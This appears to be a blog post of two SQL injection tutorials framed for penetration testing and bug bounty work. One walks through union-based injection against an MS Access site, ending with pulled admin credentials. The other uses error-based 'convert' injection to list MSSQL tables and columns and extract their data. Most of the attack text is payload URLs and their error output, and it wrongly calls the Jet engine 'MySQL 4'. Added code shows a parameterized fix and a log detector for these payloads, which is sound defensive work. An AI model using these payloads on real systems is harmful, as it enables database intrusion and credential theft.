
09 October, 2022

MS-Access Injection - Tutorial - Penetration Testing | Bug Bounty Program

In this tutorial you will learn how to inject into an MS Access database.

We will do the injection manually. First we have to check whether our target site is vulnerable, so we use the regular injection test: add a single quote ' at the end of the parameter and execute the URL.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341'

Here we get the error:

ERROR:
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'ID =341''.
/dettaglio-news.asp, line 91

So our target is vulnerable. Before starting the rest of the process we first have to balance our query. We will try different comments to balance it.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--+ (error)

ERROR: Syntax error (missing operator) in query expression 'ID =341--'.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341-- (again an error)

Now let's check the null byte ";%00":

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341;%00 (error gone)

So we will continue injecting with the null byte at the end of the parameter.

Now we have to count the total number of columns. For this we use the normal ORDER BY command.

Let's check the total number of columns:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 1;%00

No error. The page loaded normally.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 5;%00

Again no error.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 8;%00

Again the page loaded normally, but at order by 9 we get the error:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 9;%00

ERROR:
Microsoft JET Database Engine error '80040e14'
The Microsoft Jet database engine does not recognize '9' as a valid field name or expression.
/dettaglio-news.asp, line 91

So there are 8 columns.

Now let's prepare our UNION-based command. After executing the UNION-based query we get an error:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8;%00

ERROR:
Microsoft JET Database Engine error '80004005'
Query input must contain at least one table or query.
/dettaglio-news.asp, line 91

Here comes the main part. As our column count is correct, it seems the database is MySQL 4.

Now we have to guess the tables and columns. First we will guess the tables.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from Login;%00

It gives us an error:

ERROR:
Microsoft JET Database Engine error '80040e37'
The Microsoft Jet database engine cannot find the input table or query 'login'. Make sure it exists and that its name is spelled correctly.
/dettaglio-news.asp, line 91

This means the table does not exist. Let's try another.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from tabladmin;%00

Still the same error. But when we try the table admin, the error is gone.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from admin;%00

With the table admin the error is gone and we can see the vulnerable columns on the web page.



You can see that 2, 3 and 6 are the vulnerable columns, so now we have to guess the column names. We will put our column names in place of these vulnerable columns.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,admin_id,4,5,6,7,8 from admin;%00

It gives us an error:

ERROR:
Microsoft JET Database Engine error '80040e10'
No value given for one or more required parameters.
/dettaglio-news.asp, line 91

This means the column does not exist. Let's try another.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,login_id,4,5,6,7,8 from admin;%00

Still the same error. When we put in the username column, the error is gone.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,username,4,5,6,7,8 from admin;%00

So it gives us Username:01775IO5

Now let's guess the column for the admin password. The column password also exists there.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,password,4,5,6,7,8 from admin;%00

It gives us Password="bEx0Th6

So we will do the same for other sites to inject into the database.
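Every step above depends on two defects in the page handler: the ID value is concatenated into the SQL text, and the engine's error message is returned to the browser. The following added example (not code from the original post) puts that handler next to a hardened one; SQLite stands in for the Jet engine, and the table layout, sample rows and function names are assumptions made for illustration.

```python
import sqlite3

# Request values quoted from the tutorial above (null-byte suffix omitted).
PAGE_PAYLOADS = [
    "341'",
    "341 order by 9",
    "341 Union Select 1,2,username,4,5,6,7,8 from admin",
]

def make_db():
    # Constructed sample data; SQLite stands in for the Jet engine (assumption).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER, c2, title, c4, c5, body, c7, c8);
        INSERT INTO news VALUES (341, 0, 'Headline', 0, 0, 'Story text', 0, 0);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO admin VALUES ('sample-admin', 'sample-secret');
    """)
    return db

def vulnerable_lookup(db, raw_id):
    # The flaw the tutorial relies on: the parameter is pasted into the SQL
    # text and the engine's error message goes back to the client.
    try:
        return db.execute("SELECT * FROM news WHERE id = " + raw_id).fetchall()
    except sqlite3.Error as exc:
        return "ERROR: " + str(exc)

def hardened_lookup(db, raw_id):
    # 1) The ID is numeric: accept only 1 to 9 ASCII digits.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return "Not found"
    try:
        # 2) Bound parameter: the value can never become SQL syntax.
        sql = "SELECT * FROM news WHERE id = ?"
        return db.execute(sql, (int(raw_id),)).fetchall()
    except sqlite3.Error:
        # 3) Details belong in the server log; the client sees a generic page.
        return "Not found"

if __name__ == "__main__":
    db = make_db()
    for p in ["341"] + PAGE_PAYLOADS:
        print(repr(p), "->", vulnerable_lookup(db, p), "|", hardened_lookup(db, p))
```

With the hardened handler the quote test, the ORDER BY count and the UNION query all produce the same generic response, so there is no error text to read table or column names from.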

MSSQL Injection Using Convert - Penetration Testing - Bug Bounty Program

In our previous tutorial we discussed union-based injection. Now let's come to the next part. In this tutorial you will learn about injecting a site with the convert attack. How does this command actually work? Convert works between two data types: we give the server a command inside convert, the conversion to the other data type fails, and the error message gives us the specific data that the command returned.

So let's start our injection manually. We have a target, so let's check whether it is vulnerable to injection. We execute the URL with a single quote ' added at the end of the target parameter.

http://www.Vuln-Site.com/authorprofile.asp?id=46'

It gives us an error:

ERROR:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.
/authorprofile.asp, line 10

Our target site is vulnerable. As we are injecting with the convert attack, we do not need to count the total number of columns. We will execute our commands directly with convert.

Let's check the version.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,@@version)--

After executing the query we get the version.

Here is the version: Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) ' to data type int.
/authorprofile.asp, line 10

Now let's check the current database name.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,db_name())--

And we get the current database name.

This is the current database name: museindia

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'museindia' to data type int.
/authorprofile.asp, line 10

Now that we have the version and the database name, let's move on to getting the tables.

This is our query for getting the tables:

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 table_name from information_schema.tables))--+

After executing the query we get the first table name.

Table name: about

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'about' to data type int.
/authorprofile.asp, line 10

To get the other tables from the database, we add the previous table names, each enclosed in single quotes, inside parentheses.

For example:

and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('OUR_PREVIOUS_TABLE_NAME_1','OUR_PREVIOUS_TABLE_NAME_2')))--+

So let's check the other tables in the database.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('about')))--+

And we get the next table name.

Next table name: aucon

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'aucon' to data type int.
/authorprofile.asp, line 10

In this way we continue getting other tables until we get the required table.

Here we get the table name: members


Now let's get the column names from this table.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='members'))--+

We get the first column name.

This is the first column name: memberid

Let's get the other columns the same way we got the other tables from the database.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='members' and column_name not in ('memberid')))--+

After getting the column names, the final part is extracting data from the columns.

This will be our final query:

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 OUR_COLUMN_NAME_HERE from OUR_TABLE_NAME_HERE))--+

This query will print the data from the columns on the web page.
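The requests in both tutorials leave a recognisable trail in the web server's access log: a quote after a numeric ID, ORDER BY counting, UNION SELECT, convert(int, ...) and information_schema lookups, many of them answered with an error status. The following added example (not part of the original post) tags those shapes per client address; the log field order, the sample lines and the assumption that the ASP errors are logged as status 500 are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request shapes taken from the two tutorials above, matched after URL-decoding.
RULES = {
    "quote_probe":  re.compile(r"=\d+'"),
    "order_by_n":   re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "convert_leak": re.compile(r"\bconvert\s*\(\s*int\s*,", re.I),
    "schema_enum":  re.compile(r"information_schema\.(tables|columns)", re.I),
    "null_byte":    re.compile(r"\x00"),
}

# Constructed sample lines. Assumed field order:
# date time c-ip cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2022-10-09 10:00:01 203.0.113.7 /dettaglio-news.asp ID=341' 500
2022-10-09 10:00:09 203.0.113.7 /dettaglio-news.asp ID=341+order+by+9;%00 500
2022-10-09 10:00:20 203.0.113.7 /dettaglio-news.asp ID=341+Union+Select+1,2,3,4,5,6,7,8+from+admin;%00 200
2022-10-09 10:02:00 203.0.113.7 /authorprofile.asp id=46+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
2022-10-09 10:03:00 198.51.100.20 /dettaglio-news.asp ID=341 200
"""

def scan(log_text):
    """Return {client_ip: {"tags": [...], "errors": n}} for suspicious requests."""
    hits = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue  # not a line in the assumed format
        ip, query, status = parts[2], unquote_plus(parts[4]), parts[5]
        tags = {name for name, rx in RULES.items() if rx.search(query)}
        if not tags:
            continue
        entry = hits.setdefault(ip, {"tags": set(), "errors": 0})
        entry["tags"] |= tags
        if status == "500":  # error responses are what leak the data
            entry["errors"] += 1
    return {ip: {"tags": sorted(e["tags"]), "errors": e["errors"]}
            for ip, e in hits.items()}

if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG).items():
        print(ip, info)
```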
